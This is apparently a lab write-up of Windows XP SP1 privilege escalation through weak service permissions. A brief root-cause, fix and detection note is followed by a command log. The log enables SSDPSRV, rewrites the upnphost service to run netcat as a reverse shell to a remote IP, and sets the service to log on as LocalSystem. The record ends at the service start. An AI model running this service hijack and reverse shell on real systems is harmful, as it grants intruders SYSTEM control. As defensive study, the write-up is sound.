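Writeup: privilege escalation on Windows XP SP1 via weak service permissions

Root cause shown below: accesschk reports that Authenticated Users hold SERVICE_ALL_ACCESS on SSDPSRV and upnphost, so any logged-on account can change those services' start type, binary path and logon account. The fix is to remove that write access from the service ACLs. A change to a service's BINARY_PATH_NAME or SERVICE_START_NAME (as in the final `sc qc upnphost` output) is the event to alert on.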

C:\Inetpub\wwwroot>accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS

C:\Inetpub\wwwroot>accesschk.exe /accepteula -ucqv SSDPSRV
accesschk.exe /accepteula -ucqv SSDPSRV
SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS

C:\Inetpub\wwwroot>accesschk.exe /accepteula -ucqv upnphost
accesschk.exe /accepteula -ucqv upnphost
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS

C:\Inetpub\wwwroot>sc qc upnphost
sc qc upnphost
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : Universal Plug and Play Device Host  
        DEPENDENCIES       : SSDPSRV  
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub\wwwroot>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : SSDP Discovery Service  
        DEPENDENCIES       :   
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub\wwwroot>sc query SSDPSRV
sc query SSDPSRV

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        STATE              : 1  STOPPED 
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077       (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Inetpub\wwwroot>sc query upnphost
sc query upnphost

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS 
        STATE              : 1  STOPPED 
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077       (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Inetpub\wwwroot>net start SSDPSRV
net start SSDPSRV
System error 1058 has occurred.

The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.


C:\Inetpub\wwwroot>sc config SSDPSRV start= auto
sc config SSDPSRV start= auto
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub\wwwroot>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : SSDP Discovery Service  
        DEPENDENCIES       :   
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub\wwwroot>net start SSDPSRV
net start SSDPSRV
The SSDP Discovery Service service is starting.
The SSDP Discovery Service service was started successfully.


C:\Inetpub\wwwroot>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 50C3-3741

 Directory of C:\Inetpub\wwwroot

02/04/2022  08:37 PM    <DIR>          .
02/04/2022  08:37 PM    <DIR>          ..
02/04/2022  08:37 PM           222,592 accesschk.exe
02/04/2022  08:34 PM             1,221 gerh.asp
09/19/2008  06:06 PM                 7 index.htm
02/04/2022  08:35 PM            59,392 nc.exe
02/04/2022  08:36 PM                 0 radE4009.tmp
02/04/2022  08:36 PM            66,560 whoami.exe
               6 File(s)        349,772 bytes
               2 Dir(s)   1,630,248,960 bytes free

C:\Inetpub\wwwroot>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub\wwwroot>sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub\wwwroot>sc qc upnphost
sc qc upnphost
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : Universal Plug and Play Device Host  
        DEPENDENCIES       : SSDPSRV  
        SERVICE_START_NAME : LocalSystem  

C:\Inetpub\wwwroot>net start upnphost
